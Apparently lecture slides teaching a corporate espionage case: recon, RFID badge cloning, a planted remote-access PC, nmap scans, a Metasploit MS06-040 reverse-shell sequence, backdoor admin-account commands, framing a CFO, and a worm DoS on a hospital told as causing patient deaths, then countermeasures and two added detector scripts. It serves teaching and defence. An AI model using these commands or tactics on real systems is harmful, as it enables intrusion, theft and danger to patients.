
Tel 283



Presentation Transcript


  1. Tel 283 Corporate Espionage

  2. Background
  • Competitor of Alki Pharmaceuticals wants to get any technical information or research
  • Not have the hack traced back
  • Launch a disabling attack on the hospital across from Alki
  • Critical services impacted, resulting in patient death
  • “Contractor” threatened hacker’s girlfriend
  • Eight weeks allowed for the hack

  3. Cost of corporate espionage
  • 1999: $25 Billion (US Chamber of Commerce survey)
  • 2003: $89 Billion from the Fortune 1000 companies (PricewaterhouseCoopers and ASIS survey; ASIS is the American Society for Industrial Security)
  • 2007: $100 Billion plus

  4. The Exploit
  • Reconnaissance
  • Physical Access
  • Executing the Hacks
  • DoS of Hospital
  • Other “stuff”

  5. Recon
  • Google search: “intext:alki pharmaceuticals”
  • Mentions software vendor for Alki
  • Get info from vendor’s webpage: technical documentation, type of servers, ports
  • Technical forum: SA from Alki complaining about software’s restrictions
  • Physical recon: employees have RFID badges
  • www.sec.gov: EDGAR search on publicly traded corporations

  6. RFIDIOt
  • Python libraries for reading RFID devices
  • Readers are available for purchase; depending on standard, anywhere from $50 to $1000
  • A writer will clone a valid RFID device
  • Phoenix met official of Alki
  • Got physically close enough to read her badge
  • Now has access to every place the CFO is allowed

  7. Social engineering
  • CFO takes “prospective employee” on tour
  • Observes which areas are carded
  • Reads cards of 15 employees
  • Remembering the order of cards being read and locations
  • Will attempt to get a janitor’s RFID card as well

  8. Tools
  • Mini-PC with Vista
  • VMWare running Knoppix Live CD ISO
  • Integrated CDMA-EVO cellular card
  • Integrated 10/100 Ethernet NIC
  • Phoenix hopes to plant the mini-PC physically at Alki
  • Get IP via DHCP
  • Connect to Internet using the cellular card
  • Using Hotmail account traceable back to Alki employee (backup email account points back to the employee)
  • Set up GoToMyPC trial account
  • Physical intrusion set for when janitors start night services

  9. Intrusion
  • Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room
  • Uses card to enter the NOC room
  • No biometrics in place!
  • Racks are neatly labeled indicating which units are R&D switches

  10. Intrusion
  • Phoenix plugs patch cable into an open port on R&D switch
  • Attaches the mini-PC to the switch
  • Gets an IP via DHCP
  • Boots up the Knoppix Live CD ISO under VMWare
  • ifconfig reveals a supplied IP address of 10.0.0.6
  • Going back to the host OS (Vista), he fires up the CDMA software
  • GoToMyPC is connected to the Internet
  • Secretes the mini-PC and the power supply
  • Takes a wireless access point, with an Alki inventory control tag, and leaves

  11. Intrusion
  • On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection
  • Brings up a web browser
  • Utilizing the CFO’s bogus account, logs into www.gotomypc.com
  • Connects to the planted mini-PC in the Alki NOC room

  12. Intrusion
  • On returning home, reconnects using GoToMyPC
  • Goes to the VMWare and in the shell starts up Nmap: nmap 10.0.0.0/24
  • Shows the hosts and which ports are listening on these hosts
  • 10.0.0.14 shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering)
  • nmap -A 10.0.0.14 -p 12345 attempts to uncover the OS
  • Response is either XP / SP2 or Windows Server 2003
  • Directory Services ports are open, so probably a Windows Server 2003 host

  13. Intrusion
  • Recalling complaints about vendor’s software being incapable of working with SP1
  • www.microsoft.com/security: search for SP1 fixes
  • MS06-040: netapi32.dll exploitable
  • Uses Metasploit to see if there’s an available exploit: use windows/smb/ms06_040_netapi
  • Gets the Metasploit prompt: msf exploit(ms06_040_netapi) >

  14. Metasploit
  • At the Metasploit prompt: set PAYLOAD generic/shell_reverse_tcp, set RHOST 10.0.0.14, set LHOST 10.0.0.6
  • Phoenix now sees the following on his screen: C:\WINDOWS\system32>
  • Phoenix has access to the target system!

  15. Intrusion: Target Access
  • Phoenix is on the target system with Local System privilege, higher than Administrator!!!
  • Once on the target system Phoenix enters the following commands at the prompt
  • net user lindaalki$$ /ADD (Linda is the CFO)
  • net localgroup administrators linda /ADD
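The account-creation step above is what a defender should be alerting on. As an added example (not from the slides), this detector looks for a local account that is created and then added to Administrators within a few minutes; the event records are constructed, shaped like Windows Security log entries (4720 = account created, 4732 = member added to a security-enabled local group).

```python
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, subject, target, group).
# The first pair mirrors the slide: an account created from the SYSTEM context
# and promoted to Administrators seconds later; the second is a normal helpdesk flow.
SAMPLE_EVENTS = [
    ("2024-01-05T02:14:03", 4720, "SYSTEM",       "linda",   None),
    ("2024-01-05T02:14:09", 4732, "SYSTEM",       "linda",   "Administrators"),
    ("2024-01-05T09:30:00", 4720, "helpdesk.bob", "newhire", None),
    ("2024-01-06T10:00:00", 4732, "helpdesk.bob", "newhire", "Remote Desktop Users"),
]


def find_suspicious_admin_creations(events, window_minutes=10):
    """Return one dict per account whose creation (4720) is followed by
    Administrators membership (4732) within window_minutes.
    Creation from a service context such as SYSTEM, rather than by a named
    administrator, is flagged separately as an extra red flag."""
    created = {}  # account -> (creation time, subject who created it)
    hits = []
    for ts, eid, subject, target, group in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if eid == 4720:
            created[target] = (t, subject)
        elif eid == 4732 and group == "Administrators" and target in created:
            t0, creator = created[target]
            delta = t - t0
            if delta <= timedelta(minutes=window_minutes):
                hits.append({
                    "account": target,
                    "created_by": creator,
                    "seconds_to_admin": int(delta.total_seconds()),
                    "system_context": creator.upper() == "SYSTEM",
                })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_admin_creations(SAMPLE_EVENTS):
        print(hit)
```

In a real deployment the same logic runs over Security log exports (or a SIEM query) rather than the inline list; only the "linda" pair is reported here.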

  16. Intrusion: Hospital
  • Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER
  • Gets IP address
  • Plugs in the stolen Alki wireless access point
  • Resets the AP to factory defaults
  • Configures it to support DHCP
  • Verifies that he can connect via the AP
  • Jacks the laptop into Ethernet port
  • Runs nmap 10.10.10.0/24
  • Response is 12 hosts, possibly all in ER due to proximity
  • Maps out the OS on each host
  • Results go to ADS text file: nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt

  17. Intrusion: Hospital
  • The laptop was purchased with cash with false information supplied at a computer “superstore”
  • Laptop loaded with viruses, virus construction kit, recon tools, etc.
  • Using the laptop, Phoenix logged into the Hotmail account (posing as CFO from Alki)
  • Leaving the “remember me” settings on, making investigators’ job easier
  • Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs
  • Visited websites, leaving history on PC
  • Verifies that the rogue access point functions from outside the hospital

  18. Intrusion: Alki
  • R&D server partitions mapped out: C: system partition; D: data partition, shared by researchers
  • Over a network connection a network share is established to a 1 TB drive attached
  • Windows “Backup” of D: on the target system to the 1 TB drive
  • Physical entry back into Alki NOC room
  • Using the mini-PC and Remote Desktop
  • Data partition deleted from D:
  • Windows system directory deleted from C:

  19. DoS: Hospital
  • From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe”
  • Windows Scripting Host Worm Construction program

  20. DoS: Hospital
  • WSHWC
  • Names the worm Alkibot
  • Payload option: Launch Denial of Service Attack
  • Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap
  • These .vbs files, along with 5 additional .vbs files for the other Windows boxes, are saved on the laptop
  • Bat file constructed to execute the .vbs files sequentially
  • Executes the bat file

  21. DoS: Hospital
  • News reports
  • ER monitoring units (Solaris systems) were not able to send data out
  • Resulted in cardiac arrest of 1 patient
  • Incorrect medication prescribed to another patient
  • Drips ran out for two other patients
  • Alki executive arrested (CFO)
  • Alki stock value sharply down
  • Alki competitor announced they were ahead of schedule in release of drug

  22. Other options
  • Breach of confidentiality of employee information
  • Creation of backdoors, shell account; sell these
  • Access to Alki’s banking information (Accounting dept.)
  • Stock manipulation

  23. Summary
  • Detailed tech info of Alki software uncovered by going to vendor’s site
  • RFID attack assisted in gaining physical access to Alki, bolstered by social engineering
  • Nmap scan identified Alki R&D server
  • Microsoft.com used to uncover potential exploits for the server
  • Metasploit used to invoke the exploit
  • Windows Backup used to copy R&D data remotely using network share
  • Delete of data (getting rid of evidence, causing diversion)
  • Hotmail account set up to implicate CFO
  • Set up rogue AP in hospital, launched DoS attack

  24. Countermeasures
  • Physical security
  • Single factor access to restricted areas: implement multi-layer measures
  • Note: Encryption of the RFID means nothing if it’s cloned, as the attacker does not need to “read” the data, just use it
  • Cameras / CCTV should be used
  • Access device should not also be the ID card
  • ID card is visible; RFID device should be in a shielded carrier
  • Disable open ports on a switch

  25. Countermeasures
  • Scanning attack
  • Turn off ICMP
  • Turn on Windows Firewall
  • Simple nmap scans would come back with no results
  • Possible to get results, just more complex scans
  • Client IDS, e.g. Cisco Security Agent (CSA)
  • Detects SYN stealth scans, for example
  • Perhaps make it impossible to determine which host was the R&D server
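The "client IDS detects SYN stealth scans" bullet is the kind of check a host or firewall log can support directly. As an added example (not from the slides or from CSA), this detector reads firewall-style log lines and flags a source that sends bare SYNs to many distinct ports on one host within a short window; the line format and the sample lines are constructed, reusing the addresses from the scenario.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log line format: ISO timestamp, source, destination, dest port, TCP flags.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S+)$"
)

# Constructed sample: 10.0.0.6 probes many ports on 10.0.0.14 with SYN only,
# while 10.0.0.21 completes a normal handshake to one service.
SAMPLE_LOG = """\
2024-01-05T02:10:00 SRC=10.0.0.6 DST=10.0.0.14 DPT=22 FLAGS=SYN
2024-01-05T02:10:00 SRC=10.0.0.6 DST=10.0.0.14 DPT=80 FLAGS=SYN
2024-01-05T02:10:01 SRC=10.0.0.6 DST=10.0.0.14 DPT=135 FLAGS=SYN
2024-01-05T02:10:01 SRC=10.0.0.6 DST=10.0.0.14 DPT=139 FLAGS=SYN
2024-01-05T02:10:01 SRC=10.0.0.6 DST=10.0.0.14 DPT=389 FLAGS=SYN
2024-01-05T02:10:02 SRC=10.0.0.6 DST=10.0.0.14 DPT=445 FLAGS=SYN
2024-01-05T02:10:02 SRC=10.0.0.6 DST=10.0.0.14 DPT=12345 FLAGS=SYN
2024-01-05T02:10:05 SRC=10.0.0.21 DST=10.0.0.14 DPT=445 FLAGS=SYN
2024-01-05T02:10:05 SRC=10.0.0.21 DST=10.0.0.14 DPT=445 FLAGS=ACK
"""


def detect_syn_scans(log_text, port_threshold=5, window=timedelta(seconds=10)):
    """Return {(src, dst): distinct_ports} for sources whose SYN-only probes hit
    at least port_threshold distinct ports on one host inside the window."""
    syn_probes = defaultdict(list)  # (src, dst) -> [(time, port)]
    acked = set()                   # (src, dst) pairs that went on to complete a handshake
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        key = (m["src"], m["dst"])
        if m["flags"] == "SYN":
            syn_probes[key].append((datetime.fromisoformat(m["ts"]), int(m["dpt"])))
        elif "ACK" in m["flags"]:
            acked.add(key)  # a real client, not a half-open scan
    alerts = {}
    for key, probes in syn_probes.items():
        if key in acked:
            continue
        probes.sort()
        for i, (t0, _) in enumerate(probes):  # sliding window starting at each probe
            ports = {p for t, p in probes[i:] if t - t0 <= window}
            if len(ports) >= port_threshold:
                alerts[key] = len(ports)
                break
    return alerts
```

The threshold and window are tuning knobs; a slow scan spread over hours, which the slide's "more complex scans" bullet alludes to, needs a longer window or per-source port counting across the whole log.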

  26. Countermeasures
  • Social Engineering: training! policies, testing of policies
  • OS attacks: patching
  • Pressure vendor to fix application to work with later release of OS which is patched
  • Consider another software solution (dump the vendor)
  • Data theft: encryption
